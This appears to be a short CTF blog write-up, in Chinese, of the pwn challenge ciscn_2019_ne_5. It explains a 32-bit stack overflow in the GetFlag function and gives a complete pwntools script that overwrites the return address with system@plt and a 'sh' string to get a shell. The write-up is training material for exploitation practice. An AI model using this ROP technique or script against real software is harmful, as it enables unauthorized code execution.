ciscn_2019_ne_5

Posted Dec 30, 2023 Updated Nov 12, 2024

By bamuwe

1 min read

32位ROP劫持
程序逻辑
/bin/sh的替代方案sh
栈上覆盖
ROPgadgets查找字符串
GetFlag函数
1.GetFlag函数中把先前AddLog中加入的src变量赋给了dest,这里存在溢出
2.Print函数中有system函数,通过plt_system利用
3.通过ROPgadgets得到sh字符串构造payload得到shell

  
bamuwe@qianenzhao:~/done/ciscn_2019_ne_5$ ROPgadget --binary ciscn_2019_ne_5 --string 'sh'
Strings information
============================================================
0x080482ea : sh

	administer
	1
payload1	padding		0x4C	dest
				(padding+leave)
	system_plt_addr	ret		system
	0xdeadbeef
	sh		0x080482ea

  
from pwn import *
context.log_level = 'debug'
elf = ELF('./ciscn_2019_ne_5')
io = process('./ciscn_2019_ne_5')
#io = gdb.debug('./ciscn_2019_ne_5','break *080486C7')
io.sendlineafter(b'Please input admin password:',b'administrator')
io.sendlineafter(b':\n',b'1')
payload1 = b'A'*0x4C+p32(elf.sym['system'])+p32(0xdeadbeef)+p32(0x080482ea)	#不能用p32(0)替代p32(deadbeef)
io.sendlineafter(b'Please input new log info:',payload1)
io.sendlineafter(b':\n',b'4')
io.interactive()

ctf, pwn

32bit rop

This post is licensed under CC BY 4.0 by the author.

Trending Tags